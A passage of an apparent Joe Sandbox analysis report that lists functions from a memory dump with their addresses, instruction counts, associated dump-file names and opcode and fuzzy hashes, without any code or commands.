                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4528eec14bead00aa2d9c85ba96f400933376672da741788ed4faa78718e8c59
                    • Instruction ID: 2f8a6629fbf6bee2d889c0863c8f4565cea0a496336d10421b216b2cf4d7b672
                    • Opcode Fuzzy Hash: 4528eec14bead00aa2d9c85ba96f400933376672da741788ed4faa78718e8c59
                    • Instruction Fuzzy Hash: 86E13E729497248BC324DF59D88029AF3E1BF88714F4B8A3DDD99E7301D675AD108BC6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BC63F0 Relevance: .4, Instructions: 391COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4fe759b8f0d9f3ddc17931c565871c1950d0d189f6f7cd7ee860d1120e07df5d
                    • Instruction ID: fb3446faec79aa9531b12ac28efc8fd539d724702778b8c574c8f01c22e26098
                    • Opcode Fuzzy Hash: 4fe759b8f0d9f3ddc17931c565871c1950d0d189f6f7cd7ee860d1120e07df5d
                    • Instruction Fuzzy Hash: 74D18F71A083419FCB18CF24C490FAAB7E1EF95314F1588ADD89A97381D771AC55CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C184A0 Relevance: .3, Instructions: 315COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7da40c4257207c4228adc07e7aa66d9599142669ef0fbb5a24738c40c289d609
                    • Instruction ID: 3df4b2988d6f0c2d60f5c7e3a3e3a4e8195615856e9bd059205d1e16fb5477b6
                    • Opcode Fuzzy Hash: 7da40c4257207c4228adc07e7aa66d9599142669ef0fbb5a24738c40c289d609
                    • Instruction Fuzzy Hash: 70B192716047058BC72CDF69DCA156BF7E2BFC8314F09892DE9AA83345DB38A9148F48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C1A060 Relevance: .3, Instructions: 286COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0d4738e34f223948a0a3aa5fa8b177caa9eb5847155e6b7b76b15068ea605d9b
                    • Instruction ID: 5dea3fc19cbd6aebe309c3fb4d291c9d16e1b675347cc3ec132512deb22b058f
                    • Opcode Fuzzy Hash: 0d4738e34f223948a0a3aa5fa8b177caa9eb5847155e6b7b76b15068ea605d9b
                    • Instruction Fuzzy Hash: 41913772A007109FD7209E28CC8175AB7E1EFC6320F59862CE8A9973D1E775ED45DB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C4D020 Relevance: .3, Instructions: 282COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c857bc6f47c11b45454758b084b7876ee5455ee118828e974ce89500b979fd96
                    • Instruction ID: ba70e9bd01dc4bff4972619139c8d0e31ed4658c69f8a4b0992a62038df8066d
                    • Opcode Fuzzy Hash: c857bc6f47c11b45454758b084b7876ee5455ee118828e974ce89500b979fd96
                    • Instruction Fuzzy Hash: 1FB158E6C0AFA947EB136B3E9C83252B650AFF3294B10C347FCB076D52E711E554A204
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C38770 Relevance: .3, Instructions: 272COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 689a8463b672db8d1c6ca4baa45038dd3f81f79e98cb7c58fd19a428798e5e6f
                    • Instruction ID: ff37247d1cab8a690457534a9ddb2a1a5672e6d5f2a0c341fe406148ecbcd295
                    • Opcode Fuzzy Hash: 689a8463b672db8d1c6ca4baa45038dd3f81f79e98cb7c58fd19a428798e5e6f
                    • Instruction Fuzzy Hash: D1B19CB29083059FC340CF1AD88051AFBE1BFC8764F5A991EF998A3711D770E9598F86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCC97D Relevance: .3, Instructions: 270COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 40c5af2cbb30f09750c43913967a71936f2f1ca84df114ea6cb75d0a2ff5e618
                    • Instruction ID: a78476a51d8aa454a1a9a455bd117751e44fcb614b2c67dbb5eb47b9fdbe9e2c
                    • Opcode Fuzzy Hash: 40c5af2cbb30f09750c43913967a71936f2f1ca84df114ea6cb75d0a2ff5e618
                    • Instruction Fuzzy Hash: 22912E746047019FDB20CF68C885F267BE5EF6A314F1409ACEA9A9B292C772FC51CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C2E470 Relevance: .2, Instructions: 222COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: faf02e245addd143875e38bb15a9324179dc89c0f84e1bd529225dbb1d473599
                    • Instruction ID: b358e3eacf2535effa9e882492e753d9cec246bcbb0fd7ed4492d8db02edfba2
                    • Opcode Fuzzy Hash: faf02e245addd143875e38bb15a9324179dc89c0f84e1bd529225dbb1d473599
                    • Instruction Fuzzy Hash: B4A15F71A10952ABC35ACF1DC894BB5B3A1FB44309F8A8339DE4557288CB39B935CBD4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C2CD20 Relevance: .2, Instructions: 201COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6192e6599f6c1a011b87dc1cb94f1ec900cf2b7d554ac711b2e4dab0462bc958
                    • Instruction ID: 3de607834fd322eddff4999d0b1231d790840e59325b55b77c8b664b410a98f8
                    • Opcode Fuzzy Hash: 6192e6599f6c1a011b87dc1cb94f1ec900cf2b7d554ac711b2e4dab0462bc958
                    • Instruction Fuzzy Hash: 434101B7E097280BC7149E64A4D53A6B3C2EBD9211F0F456CEDE967382DA74AD148BC0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C3CDF0 Relevance: .2, Instructions: 182COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 58aab18527f2d9c54fbc44a68bfb9820579336934f8c8de9481524afc0a08eb2
                    • Instruction ID: fdb84fd0a181873916c1f6638ae6c30ae2ba62b05b5df983283e2960f871c6bb
                    • Opcode Fuzzy Hash: 58aab18527f2d9c54fbc44a68bfb9820579336934f8c8de9481524afc0a08eb2
                    • Instruction Fuzzy Hash: 6B51C6B490430857D734EA10EC46FDBB398FB98708F508C3CE585932C3EA75A66AD796
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C563AB Relevance: .2, Instructions: 158COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b82f4562c825d87db9937be0d784f959c9f6ed46b2b441a05cc9ce24cb6843e9
                    • Instruction ID: 789b51857b0f80103f960719d8503196d4d1653bfe6527b390a70101da8478f0
                    • Opcode Fuzzy Hash: b82f4562c825d87db9937be0d784f959c9f6ed46b2b441a05cc9ce24cb6843e9
                    • Instruction Fuzzy Hash: E251B375E00219EFDF14CF99C981AEEBBB2EF88300F59805DE815AB201D7349E94CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C2E280 Relevance: .2, Instructions: 150COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 021106bc591d73f0a5c59a10a07cc09d2195f305d6a2206939386914035ba1d4
                    • Instruction ID: 0a3356569e18a2faedcc726b020a8ccb069c15cd22f7eb73e76a326a574d1e4a
                    • Opcode Fuzzy Hash: 021106bc591d73f0a5c59a10a07cc09d2195f305d6a2206939386914035ba1d4
                    • Instruction Fuzzy Hash: 925193B3A28A114BE348DE25CD4631BB7D2EBC4310F0AC93DE595E7345CA74E911DB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C2D0A0 Relevance: .1, Instructions: 144COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d709a310d6539a7ab84d22519e105320ad01ae77bd681a478ed521ebe115504b
                    • Instruction ID: 781752e3f5be75620b8f3bf0112b6e33d183f7fc2ccbbfd2dd047ec06e21f0ab
                    • Opcode Fuzzy Hash: d709a310d6539a7ab84d22519e105320ad01ae77bd681a478ed521ebe115504b
                    • Instruction Fuzzy Hash: E3410832B1416147D31CDA3D8C5566FB6D3EBC8220B49C73DE946D77C6EA749815C381
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C2CF20 Relevance: .1, Instructions: 139COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a328411ea450acdfa46a127d5aafbf676ff44268fb3cf12707548be363ce5076
                    • Instruction ID: e3399bee5978e5270cd05f6ac735e0265dafbdd3d9b4b099c25b14c8a620c99c
                    • Opcode Fuzzy Hash: a328411ea450acdfa46a127d5aafbf676ff44268fb3cf12707548be363ce5076
                    • Instruction Fuzzy Hash: D541F672B1865A0BD34CED398C5966FF3839BC4210F49C63DEA06C73C6EE749969C284
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C4CD90 Relevance: .1, Instructions: 130COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: efc8e849ae8c76d23c8fcad609f0b786664c632c614d697cfe4ff8e8bae2e0e5
                    • Instruction ID: b278b098667bced88f1330def090316a911c7bb39fc3999283fc416714542c97
                    • Opcode Fuzzy Hash: efc8e849ae8c76d23c8fcad609f0b786664c632c614d697cfe4ff8e8bae2e0e5
                    • Instruction Fuzzy Hash: FE41E1A5C0AF4946E713A73A9883353E6949FF7694F40CB0FFCE4729A1E321A2947310
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C4ED00 Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: c1e399a8e35a66455e4b1d56a1792b2888130eaf86fb0d92eb28f9c4e47ad779
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: F911E777A40092C3D6148A3ED8B46B7A796FFD6321B2F437AD0724F758D222AB45DA00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BFCF40 Relevance: .1, Instructions: 69COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 467f08de973202734f23eb519b166b4a980cc7457f451905225bbc7ba7779cd5
                    • Instruction ID: 1ac6d6ebc1450dac9dfe38691beafc77466e1f693cb69735e6343737d368c52a
                    • Opcode Fuzzy Hash: 467f08de973202734f23eb519b166b4a980cc7457f451905225bbc7ba7779cd5
                    • Instruction Fuzzy Hash: 5E1160716006098FC724CF3CC990976FBE5FF993247158B6DEA96CB384D630A848C750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C18A20 Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b49b1295778ce9f2eb9a3912326190fcff8765324f50de36fa673b09c7e64b8d
                    • Instruction ID: 1b62e4554f76f3efcdf40eb11f833cae393e9e2f7a2c59a547fc22756705946d
                    • Opcode Fuzzy Hash: b49b1295778ce9f2eb9a3912326190fcff8765324f50de36fa673b09c7e64b8d
                    • Instruction Fuzzy Hash: 84F046B2A447056FE3205E64EC82B92B7E4EBE2751F454029E984973C1E671A88897A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BFC7D0 Relevance: .0, Instructions: 16COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 279f7eb8e6c167c4409cab0f2abcd02a44e999263011f89c71bc761125bf0a14
                    • Instruction ID: cee13215f2ee49fa06431b9f6094cce8617989820ac71464e68af7250aaaae3c
                    • Opcode Fuzzy Hash: 279f7eb8e6c167c4409cab0f2abcd02a44e999263011f89c71bc761125bf0a14
                    • Instruction Fuzzy Hash: 12C0123180272057DA305E05A9057E7BAF89F03354F001444FD45A3241D370E98886DA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C3E0B0 Relevance: .0, Instructions: 14COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ebed88c84f747461b66a3920df772f270d988779ca68e89eccd22e5713835100
                    • Instruction ID: 6bf3fc107c632f759b6dda8a59da74ad46040a61eef0c44ecc8a9d3eb0b7376c
                    • Opcode Fuzzy Hash: ebed88c84f747461b66a3920df772f270d988779ca68e89eccd22e5713835100
                    • Instruction Fuzzy Hash: 94C092F273804603DB2C0478CCD970B9186A35032CF518A7AE019DAAC0C84EF9926241
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C5A4B2 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7ab7f13b2fa88397a75655b1bd4fe4b0ba8d9f6ce3449be10a51de5468010258
                    • Instruction ID: 769224e7f035b5311a292bb8e6cde673d68ce2d09e2a280635b707fea7b21673
                    • Opcode Fuzzy Hash: 7ab7f13b2fa88397a75655b1bd4fe4b0ba8d9f6ce3449be10a51de5468010258
